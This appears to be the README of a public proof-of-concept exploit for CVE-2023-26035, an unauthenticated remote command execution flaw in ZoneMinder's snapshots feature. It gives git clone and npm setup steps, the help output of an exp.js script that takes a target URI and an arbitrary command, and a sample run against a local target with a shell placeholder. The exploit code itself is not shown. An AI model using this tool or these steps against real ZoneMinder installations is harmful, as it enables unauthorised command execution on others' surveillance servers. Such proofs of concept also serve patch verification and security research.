ZoneMinder Snapshots - Unauthenticated
Grab Repo
$ git clone https://github.com/Yuma-Tsushima07/CVE-2023-26035.git
Setup
Note: Install the latest version of
node
$ npm init
$ npm i axios cheerio yargs
┌─[✗]─[v37r1x@7h3B14ckKn1gh75]─[~/Documents/Code/CVE-2023-26035]
└──╼ $node exp.js -h
Options:
--version Show version number [boolean]
-t, --target Target URI (e.g., http://example.com/zm/) [string] [required]
-c, --cmd Command to execute on the target [string] [required]
-h, --help Show help [boolean]
┌─[v37r1x@7h3B14ckKn1gh75]─[~/Documents/Code/CVE-2023-26035]
└──╼ $node exp.js -t http://127.0.0.1:8888/ --cmd '<shell>'